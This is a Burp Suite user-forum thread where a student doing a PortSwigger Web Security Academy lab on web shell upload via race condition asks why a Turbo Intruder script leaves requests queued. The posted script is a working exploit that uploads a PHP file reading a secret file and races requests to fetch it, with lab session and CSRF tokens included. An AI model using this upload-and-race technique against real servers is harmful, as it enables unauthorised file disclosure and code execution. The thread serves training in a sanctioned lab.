Burp Suite User Forum


Turbo Intruder does not send requests

Student921 | Last updated: Jun 05, 2022 05:19PM UTC

Hi, just doing the LAB: Web shell upload via race condition, but every time I start the attack with Turbo Intruder, it sends no requests but puts them in Queued. Here's my code:

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=10,)

    request1 = '''
POST /my-account/avatar HTTP/1.1
Host: 0a2c0086038f77f8c0bb9a11003200e0.web-security-academy.net
Cookie: session=fJBs6NScIngnOGf4BNFhblWJEyeJfBSy
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------3221391364914682276437579228
Content-Length: 544
Origin: https://0a2c0086038f77f8c0bb9a11003200e0.web-security-academy.net
Referer: https://0a2c0086038f77f8c0bb9a11003200e0.web-security-academy.net/my-account
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------3221391364914682276437579228
Content-Disposition: form-data; name="avatar"; filename="extract.php"
Content-Type: application/octet-stream

<?php echo file_get_contents('/home/carlos/secret'); ?>
-----------------------------3221391364914682276437579228
Content-Disposition: form-data; name="user"

wiener
-----------------------------3221391364914682276437579228
Content-Disposition: form-data; name="csrf"

ZcofzgnPJsTLuZptwviIUu2u5h8K9E0g
-----------------------------3221391364914682276437579228--
'''

    request2 = '''
GET /files/avatars/extract.php HTTP/1.1
Host: 0a2c0086038f77f8c0bb9a11003200e0.web-security-academy.net
Cookie: session=fJBs6NScIngnOGf4BNFhblWJEyeJfBSy
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: image/avif,image/webp,*/*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://0a2c0086038f77f8c0bb9a11003200e0.web-security-academy.net/my-account
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close\r\n\r\n
'''

    # the 'gate' argument blocks the final byte of each request until openGate is invoked
    engine.queue(request1, gate='race1')
    for x in range(5):
        engine.queue(request2, gate='race1')

    # wait until every 'race1' tagged request is ready
    # then send the final byte of each request
    # (this method is non-blocking, just like queue)
    engine.openGate('race1')

    engine.complete(timeout=60)


def handleResponse(req, interesting):
    table.add(req)

Michelle, PortSwigger Agent | Last updated: Jun 06, 2022 11:02AM UTC

Thanks for your message. Are you able to send the same two requests via Burp's Repeater tab?

Student921 | Last updated: Jun 06, 2022 04:05PM UTC

Hi, just tried it again for the first time today and it suddenly worked. Thank you
